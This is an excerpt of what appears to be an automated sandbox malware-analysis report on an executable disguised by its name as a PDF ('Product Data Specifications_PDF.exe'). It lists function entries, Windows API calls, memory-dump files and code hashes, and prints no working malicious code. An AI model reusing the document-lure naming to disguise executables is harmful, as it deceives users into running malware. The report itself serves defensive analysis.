                              • API ID: _wcsncpy
                              • String ID: ^B$C:\Users\user\Desktop\Product Data Specifications_PDF.exe
                              • API String ID: 1735881322-159190787
                              • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                              • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                              • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                              • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                              Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                              Download Yara Rule
                              APIs
                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                              • PostMessageW.USER32(00000000), ref: 00441C05
                                • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: FindMessagePostSleepWindow
                              • String ID: Shell_TrayWnd
                              • API String ID: 529655941-2988720461
                              • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                              • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                              • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                              • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                              Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                              Download Yara Rule
                              APIs
                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: FindMessagePostSleepWindow
                              • String ID: Shell_TrayWnd
                              • API String ID: 529655941-2988720461
                              • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                              • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                              • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                              • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                              Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                              Download Yara Rule
                              APIs
                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Message_doexit
                              • String ID: AutoIt$Error allocating memory.
                              • API String ID: 1993061046-4017498283
                              • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                              • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                              • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                              • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D